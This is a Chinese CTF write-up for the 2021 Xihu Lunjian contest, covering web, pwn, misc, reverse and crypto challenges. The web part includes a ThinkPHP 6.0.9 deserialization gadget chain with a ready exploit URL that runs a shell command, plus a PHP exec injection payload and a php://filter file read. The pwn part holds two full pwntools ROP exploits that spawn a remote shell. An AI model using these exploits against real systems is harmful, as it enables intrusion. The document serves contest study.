2021_西湖论剑WP_by玛卡巴卡开叮叮车来打CTF


2021_西湖论剑WP_by玛卡巴卡开叮叮车来打CTF

Web

Ez?upload

payload:

{(exec)//**/**/($_GET[1])}

上传文件 模板覆盖就可

img

img

灏妹的web

dirsearch 扫描 /.idea/dataSources.xml

访问即可

img

EasyTp

通过触发报错得知TP版本是6.0.9,然后提示有file参数,测试后通过伪协议读源码

http://235e3f8b-77d7-4239-963f-920b229ab552.easytp-ctf.dasctf.com:2333/public/?file=php://filter/read=convert.base64-encode/resource=index.php

读取内容:

PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNUIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDYtMjAxOSBodHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIuMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWlsLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIFsg5bqU55So5YWl5Y+j5paH5Lu2IF0KbmFtZXNwYWNlIHRoaW5rOwoKcmVxdWlyZSBfX0RJUl9fIC4gJy8uLi92ZW5kb3IvYXV0b2xvYWQucGhwJzsKCi8vIOaJp+ihjEhUVFDlupTnlKjlubblk43lupQKJGh0dHAgPSAobmV3IEFwcCgpKS0+aHR0cDsKCiRyZXNwb25zZSA9ICRodHRwLT5ydW4oKTsKCiRyZXNwb25zZS0+c2VuZCgpOwoKJGh0dHAtPmVuZCgkcmVzcG9uc2UpOwo=

解码后:



// +----------------------------------------------------------------------



// [ 应用入口文件 ]

namespace think;



require __DIR__ . '/../vendor/autoload.php';



// 执行HTTP应用并响应

$http = (new App())->http;



$response = $http->run();



$response->send();



$http->end($response);

通过这种方式能去读到文件,读了一通后读Index.php,解码后内容如下:

<?php



namespace app\controller;



use app\BaseController;



class Index extends BaseController

{

    public function index()

    {

        //return "htmlxxx13载初心不改 - 你值得信赖的PHP框架";

        if (isset($_GET['file'])) {

            $file = $_GET['file'];

            $file = trim($file);

            $file = preg_replace('/\s+/','',$file);

            if(preg_match("/flag/i",$file)){ die('no flag..');}

            if(file_exists($file)){

                echo "file_exists() return true..";

                die( "hacker!!!");

            }else {

                echo "file_exists() return false..";

                @highlight_file($file);

            }



        } else {



            echo "Error! no file parameter ";

            echo "highlight_file Error";

        }



    }



    public function unser(){

        if(isset($_GET['vulvul'])){

            $ser = $_GET['vulvul'];

            $vul = parse_url($_SERVER['REQUEST_URI']);

            parse_str($vul['query'],$query);



            foreach($query as $value)

            {

                if(preg_match("/O/i",$value))

                {

                    die('Hacking?');

                    exit();

                }

            }

            unserialize($ser);

        }



    }

}

参考https://www.shawroot.cc/1044.html这个url用///public/?payload=来来绕过O的检测

https://xz.aliyun.com/t/9310#toc-6 链子能用

<?php

namespace think\model\concern{

    trait Attribute{

        private $data = [7];

    }

}



namespace think\view\driver{

    class Php{}

}



namespace think{

    abstract class Model{

        use model\concern\Attribute;

        private $lazySave;

        protected $withEvent;

        protected $table;

        function __construct($cmd){

            $this->lazySave = true;

            $this->withEvent = false;

            $this->table = new route\Url(new Middleware,new Validate,$cmd);

        }

    }

    class Middleware{

        public $request = 2333;

    }

    class Validate{

        protected $type;

        function __construct(){

             $this->type = [

                "getDomainBind" => [new view\driver\Php,'display']

            ];

        }

    }

}



namespace think\model{

    use think\Model;

    class Pivot extends Model{} 

}



namespace think\route{

    class Url

    {

        protected $url = 'a:';

        protected $domain;

        protected $app;

        protected $route;

        function __construct($app,$route,$cmd){

            $this->domain = $cmd;

            $this->app = $app;

            $this->route = $route;

        }

    }

}



namespace{

    echo base64_encode(serialize(new think\Model\Pivot('<?php system("cat /flag"); exit(); ?>')));

}

img

http://235e3f8b-77d7-4239-963f-920b229ab552.easytp-ctf.dasctf.com:2333///public/index.php/index/unser?vulvul=O:17:%22think\model\Pivot%22:4:{s:21:%22%00think\Model%00lazySave%22;b:1;s:12:%22%00*%00withEvent%22;b:0;s:8:%22%00*%00table%22;O:15:%22think\route\Url%22:4:{s:6:%22%00*%00url%22;s:2:%22a:%22;s:9:%22%00*%00domain%22;s:37:%22%3C?php%20system(%22cat%20/flag%22);%20exit();%20?%3E%22;s:6:%22%00*%00app%22;O:16:%22think\Middleware%22:1:{s:7:%22request%22;i:2333;}s:8:%22%00*%00route%22;O:14:%22think\Validate%22:1:{s:7:%22%00*%00type%22;a:1:{s:13:%22getDomainBind%22;a:2:{i:0;O:21:%22think\view\driver\Php%22:0:{}i:1;s:7:%22display%22;}}}}s:17:%22%00think\Model%00data%22;a:1:{i:0;i:7;}}

img

Pwn

blind

通过alarm爆破syscall

import sys

from pwn import *

# context.arch = "amd64"

context.log_level = 'debug'

shell = lambda : p.interactive()

s = lambda buf: p.send(buf)

ss = lambda buf: p.send(str(buf))

sl = lambda buf: p.sendline(buf)

ssl = lambda buf: sl(str(buf))

sa = lambda delim, buf: p.sendafter(delim, buf)

ssa = lambda delim, buf: sa(delim, str(buf))

sla = lambda delim, buf: p.sendlineafter(delim, buf)





r = lambda n: p.recv(n)

ra = lambda t=tube.forever:p.recvall(t)

ru = lambda delim, drop=False: p.recvuntil(delim, drop)

rl = lambda: p.recvline()





uu32 = lambda data : u32(data.ljust(4, '\x00'))

uu64 = lambda data : u64(data.ljust(8, '\x00'))

ru64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))

e4 = lambda logg : log.success(logg)

g = lambda : gdb.attach(p)

if sys.argv[1] == 'p':

    p = process('./blind')

else:

    p = remote('82.157.6.165',59800)

elf=  ELF('./blind')

# libc=ELF('/lib/i386-linux-gnu/libc.so.6')

def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):

    payload = p64(part1)    

    payload += p64(0x0)     

    payload += p64(0x1)     

    payload += p64(jmp2)    

    payload += p64(arg3)    

    payload += p64(arg2)    

    payload += p64(arg1)    

    payload += p64(part2)   

    payload += 'A' * 56     

    return payload



pop_rdi =  0x00000000004007c3

pop_rsi_r15 = 0x00000000004007c1

payload = "a" * 0x58

payload += com_gadget(0x4007BA,0x4007A0,elf.got["read"],0,elf.got["alarm"],1)

payload += com_gadget(0x4007BA,0x4007A0,elf.got["read"],0,0x601088,0x3b)

payload += com_gadget(0x4007BA,0x4007A0,elf.got["alarm"],0x601088,0,0)

payload += (0x500 - len(payload)) * "\x00"

#g()

s(payload)

s("\xd5")

s("/bin/sh\x00" + "a" * (0x3b-8))



shell()

img

string_go

# -*- encoding: utf-8 -*-

import sys

from pwn import *

# context.arch = "amd64"

context.log_level = 'debug'

shell = lambda : p.interactive()

s = lambda buf: p.send(buf)

ss = lambda buf: p.send(str(buf))

sl = lambda buf: p.sendline(buf)

ssl = lambda buf: sl(str(buf))

sa = lambda delim, buf: p.sendafter(delim, buf)

ssa = lambda delim, buf: sa(delim, str(buf))

sla = lambda delim, buf: p.sendlineafter(delim, buf)



r = lambda n: p.recv(n)

ra = lambda t=tube.forever:p.recvall(t)

ru = lambda delim, drop=False: p.recvuntil(delim, drop)

rl = lambda: p.recvline()



uu32 = lambda data : u32(data.ljust(4, '\x00'))

uu64 = lambda data : u64(data.ljust(8, '\x00'))

ru64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))

e4 = lambda logg : log.success(logg)

g = lambda : gdb.attach(p)

read_plt =  lambda : elf.plt["read"]

write_plt = lambda : elf.plt["write"]

read_got =  lambda : elf.got["read"]

write_got = lambda : elf.got["write"]

puts_plt =  lambda : elf.plt["puts"]

puts_got =  lambda : elf.got["puts"]

main = lambda: elf.symbols["main"]



if sys.argv[1] == 'p':

    p = process('./string_go')

else:

    p = remote('82.157.20.104',25300)

elf=  ELF('./string_go')

libc=ELF('./libc-2.27.so')



sla("> ","1+2")

sla("> ","-7")

sla("> ","qqqqqqqq")

sla("> ","\x10")

r(0x38)

canary = u64(r(0x8))

r(0x18)

elf.address = u64(r(0x8)) - 0x254D

r(0x98)

libc.address = u64(r(0x8)) - 0x21BF7

#g()

#0x0000000000003cf3 : pop rdi ; ret

rdi = 0x0000000000003cf3

chain = p64(elf.address +rdi) + p64(next(libc.search("/bin/sh"))) + p64(libc.sym["system"])

payload = "a" * 0x18 + p64(canary) + "a" * 0x18 + p64(elf.address+0x00000000000014ce) + chain

#g()



sla(">>> ",payload)

#g()



shell()

img

Misc

真·签到

就公众号签到。

YUSA的小秘密

steg在red plane 0和green都能发现有数据,能看到flag字样但是不全

img

本题用到的通道是YCrCb。通过python的cv2库对img图片数据进行色彩空间转换,即可得到三个通道的数据,然后再对三个通道中的数据根据奇偶做二值化处理,也即判断数据的最低位:

参考ByteCT这个题:https://tyskill.github.io/posts/byte2020%E6%B0%B4%E5%8D%B0/

from cv2 import cv2 as cv

img = cv.imread('211119619784cbdb9fb.png')

src = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)

Y, Cr, Cb = cv.split(src)

cv.imwrite('Y.png', (Y % 2) * 255)

cv.imwrite('Cr.png', (Cr % 2) * 255)

cv.imwrite('Cb.png', (Cb % 2) * 255)

img

Yusa的秘密

首先分析进程和cmdscan和cmdlist

img

img

除彩蛋外可以发现使用了Win7的便笺,还创建了联系人

然后扫描文件,并按提示尝试过滤yusa,sakura字样

py -2 vol.py -f Yusa-PC.raw --profile=Win7SP1x64 filescan > files.txt

得到Mystery Man.contactsakura-didi.zipStickyNotes.sntYusa.contactkey.zip等可疑文件,还有好几个彩蛋,dump之后分别来查看,首先是Yusa.contact

img

然后在win7里导入StickyNotes.snt,如下所示

img

密码世界没了心跳是key.zip的解压密码,得到一个名为exp的python脚本

from PIL import Image

import struct

pic = Image.open('key.bmp')

fp = open('flag', 'rb')

fs = open('Who_am_I', 'wb')



a, b = pic.size

list1 = []

for y in range(b):

    for x in range(a):

        pixel = pic.getpixel((x, y))

        list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1], pixel[0]])



data = fp.read()

for i in range(0, len(data)):

    fs.write(struct.pack('B', data[i] ^ list1[i % a*b*6]))

fp.close()

fs.close()

还需要得到其他的信息,然后来看Mystery Man.contact

img

有一串Base32字符串,解开之后里面还有一段Base64,如下所示

img

这是你会用到的key,可以用它打开组织给你的工具。工具命名依照了传统规则。key:820ac92b9f58142bbbc27ca295f1cf48

这个是sakura-didi.zip的密码,解压得到key.bmp

img

现在还差Who_am_I.zip的解压密码,使用vol的mimikatz插件得到用户密码

img

YusaYusa520也是该压缩包的解压密码

有了上述文件,改动一下加密脚本exp就可以解密得到flag文件

from PIL import Image

import struct

pic = Image.open('key.bmp')

fp = open('flag', 'wb')

fs = open('Who_am_I', 'rb')



a, b = pic.size

list1 = []

for y in range(b):

    for x in range(a):

        pixel = pic.getpixel((x, y))

        list1.extend([pixel[1], pixel[0], pixel[2], pixel[2], pixel[1], pixel[0]])



data = fs.read()

for i in range(0, len(data)):

    fp.write(struct.pack('B', data[i] ^ list1[i % a*b*6]))

fp.close()

fs.close()

得到的是一个gif,在第十帧有flag字样

img

Reverse

gghdl

程序很复杂,patch程序尝试单字节爆破

import string 

import os 

from pwn import * 

context.log_level = 'critical' 

data = list(open('./21111961978038e80fb','rb').read()) 

flag = 'DASCTF{' 

for i in range(100):     

    data[190277+2] = len(flag)+2     

    data[0x2e74e] = 0xa2     

    for j in range(8):         

        data[0x2e74e+1+j] = 0     

    open('buf','wb').write(bytes(data))     

    os.system('chmod +x ./buf')      

    for ch in string.printable[::-1]:         

        tflag = (flag+ch+'}'*1000+'}')[:44]         

        p = process('./buf')         

        p.sendline(tflag)         

        ret =  p.recvall()         

        if b'Wrong' not in ret:             

            print(tflag)             

            flag+=ch             

            break

ROR

关键逻辑如下

外面循环5层,里面循环8层,里面循环每次添加8个字符,每个字符是通过位运算相加得到的,得到加密位置对应的数组后经过计算得到flag

v6 = [128, 64, 32, 16, 8, 4, 2, 1]

byte_405000 = [0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B, 0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7, 0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF, 0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2, 0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C, 0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE, 0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC, 0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98, 0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED, 0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8, 0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04, 0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8, 0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4, 0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9, 0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72, 0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62, 0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA, 0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A, 0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3, 0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84, 0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F, 0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1, 0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF, 0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB, 0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1, 0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F]

cipher = [0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB, 0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39, 0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39, 0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79]

enc = []

for i in cipher:

    enc.append('{:08b}'.format(byte_405000.index(i)))

flag=''

for k in range(0,len(enc),8):

    c = enc[k:k+8]

    for i in range(8):

        tmp = ''

        for j in range(8):

            tmp+=c[j][i]

        print(chr(int('0b'+tmp,2)),end="")

TacticalArmed

33轮tea sum每次加密完不重置

// xhlj1.cpp : 定义控制台应用程序的入口点。

//



#include "stdafx.h"

#include 



void decrypt(uint32_t* v, uint32_t* k, uint32_t sum) {

 uint32_t v0 = v[0], v1 = v[1];

 for (int i = 0; i<33; i++) {

  v1 -= ((v0 << 4) + k[2]) ^ (v0 + sum) ^ ((v0 >> 5) + k[3]);

  v0 -= ((v1 << 4) + k[0]) ^ (v1 + sum) ^ ((v1 >> 5) + k[1]);

  sum += 0x7E5A96D2;

 }

 v[0] = v0; v[1] = v1;

}



int main()

{

 uint32_t buf = 0;

 uint32_t sum[5];

 for (int j = 0; j < 5; j++) {

  for (int i = 0; i < 33; i++) {

   buf -= 0x7E5A96D2;

  }

  //printf("%x", buf);

  sum[j] = buf;

 }



 uint32_t k[4] = { 0x7CE45630,0x58334908,0x66398867,0x0C35195B1 };

 uint32_t v[10] = { 0x422F1DED,0x1485E472,0x35578D5,0x0BF6B80A2,0x97D77245,

  0x2DAE75D1,0x665FA963,0x292E6D74,0x9795FCC1,0x0BB5C8E9 };

 for (int i = 0; i < 5; i++) {

  decrypt(&v[i*2], k, sum[i]);

  printf("0x%x,0x%x,", v[i*2], v[i*2+1]);

 }



 return 0;



}
import libnum

flagtable = [0x3144676b,0x3242676f,0x32614779,0x41696f72,0x47695865,0x71615f38,0x437a4c6e,0x46725f4a,0x72505348,0x4b35356e]

flagstr = b''

for i in flagtable:

    flagstr += libnum.n2s(i)[::-1]

print(flagstr)

虚假的粉丝

通过搜索文件内容中有U开头S结尾的内容,找到ASCII-faded 4157.txt,里面有UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS,base64解出来是S3Cre7_K3y%20%3D%20Al4N_wAlK3R,将Al4N_wAlK3R作为key对ASCII-faded 5315.txt进行异或,得到的字符画图案为flag

import base64



with open('./f/ASCII-faded 5315.txt', 'rb') as f:

    data = f.read()



key = base64.b64decode(b'UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS')

#print(key) #'S3Cre7_K3y%20%3D%20Al4N_wAlK3R'



key = 'Al4N_wAlK3R'



dec_data = ''



for i in range(len(data)):

    dec_data += chr(data[i] ^ ord(key[i % 11]))



print(dec_data)

with open('output.txt', 'w') as f:

    f.write(dec_data)

flag: A_TrUe_AW_f4ns

Crypto

unknown_dsa

这个题目的第一步是佩尔方程 / Pell方程求最小解

def solve_pell(N, numTry = 100):

    cf = continued_fraction(sqrt(N))

    for i in range(numTry):

        denom = cf.denominator(i)

        numer = cf.numerator(i)

        if numer^2 - N * denom^2 == 1:

            return numer, denom

    return None, None



N = 

solve_pell(N)

```

然后利用脚本和题目给的求出m1,m2

import gmpy2

from functools import reduce

import hashlib

from Crypto.Util.number import *

from Crypto.Hash import SHA

def uni(P, Q):

    r1, m1 = P

    r2, m2 = Q

    d = gmpy2.gcd(m1, m2)

    assert (r2 - r1) % d == 0

    l1, l2 = gmpy2.exgcd(m1 // d, m2 // d)

    return (r1 + (r2 - r1) // d * l1 * m1) % gmpy2.lcm(m1, m2), gmpy2.lcm(m1, m2)



def CRT(eq):

    return reduce(uni, eq)

if __name__ == "__main__":

    ms1=[10537190383977432819948602717449313819513015810464463348450662860435011008001132238851729268032889296600248226221086420035262540732157097949791756421026015741477785995033447663038515248071740991264311479066137102975721041822067496462240009190564238288281272874966280,121723653124334943327337351369224143389428692536182586690052931548156177466437320964701609590004825981378294358781446032392886186351422728173975231719924841105480990927174913175897972732532233,1440176324831562539183617425199117363244429114385437232965257039323873256269894716229817484088631407074328498896710966713912857642565350306252498754145253802734893404773499918668829576304890397994277568525506501428687843547083479356423917301477033624346211335450]

    cs1 =[2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704,21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961,301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424]

    m1,mod1 = CRT(zip(cs1,ms1))   ms2=[168450500310972930707208583777353845862723614274337696968629340838437927919365973736431467737825931894403582133125917579196621697175572833671789075169621831768398654909584273636143519940165648838850012943578686057625415421266321405275952938776845012046586285747, 1921455776649552079281304558665818887261070948261008212148121820969448652705855804423423681848341600084863078530401518931263150887409200101780191600802601105030806253998955929263882382004, 25220695816897075916217095856631009012504127590059436393692101250418226097323331193222730091563032067314889286051745468263446649323295355350101318199942950223572194027189199046045156046295274639977052585768365501640340023356756783359924935106074017605019787]

    cs2 =[148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]

    print(m1)

    print(mod1)

    print(gmpy2.iroot(m1,7))

    m2, mod2 = CRT(zip(cs2, ms2))

    print(m2)

    print(mod2)

    print(gmpy2.iroot(m2, 7))

```

后面是DSA签名认证求私钥然后通过P*Q(p-1)//q解出pq然后去用做差求k然后求x1x2

脚本

import gmpy2

from Crypto.Util.number import *

from Crypto.PublicKey import DSA

from Crypto.Hash import SHA

from gmpy2 import invert,powmod

p = 95139353880772104939870618145448234251031105153406565833029787299040378395002190438381537974853777890692924407167823818980082672873538133127131356810153012924025270883966172420658777903337576027105954119811495411149092960422055445121097259802686960288258399754185484307350305454788837702363971523085335074839

q = 895513916279543445314258868563331268261201605181

t = 60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548

tmp = p * q - (p + q)

n = p* q

print(tmp)

s1 = 376599166921876118994132185660203151983500670896

s2 = 187705159843973102963593151204361139335048329243

m1=(long_to_bytes(int(8382905590662478666595114136929713707132131361720892331048437274828529226704174)))

m2=(long_to_bytes(int(10336852405630488944198347577475266693234960398137850045398990629116544863921454)))

hm1 = bytes_to_long(SHA.new(m1).digest())

hm2 = bytes_to_long(SHA.new(m2).digest())

ds = s1-s2

dm = hm1-hm2

k = gmpy2.mul(dm, gmpy2.invert(ds, q)) %q

print(k)

r1 = 498841194617327650445431051685964174399227739376

r2 = 620827881415493136309071302986914844220776856282

s3 = 674735360250004315267988424435741132047607535029

x1 = (s1*k -hm1)*gmpy2.invert(r1,q)%q

x2 = (s3*k -hm1)*gmpy2.invert(r2,q)%q

print(long_to_bytes(int(x1)))

print(long_to_bytes(int(x2)))

hardrsa

参考羊城杯2020 Power

img

from Crypto.Util.number import *

import sympy



e = 65537

y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839

g = 2

dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473

c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425

c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059



x=sympy.discrete_log(y,c1,g)

print(x)



a = sympy.Symbol('a')

p = sympy.solve(2019*a**2+2020*a**3+2021*a**4-x,a)[0]

print(p)

print(long_to_bytes(pow(c,dp,int(p))))

flag: DASCTF{98d923h4344e3bf72f8775xy65tvftv5}

密码人集合

在线数独求解器 (gwalker.cn),使用数字替换中文字符去求解就行

img

flag: DASCTF{4dbd22a894c9b668a5a40200ba879273}


文章作者: LANVNAL
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 LANVNAL !
  目录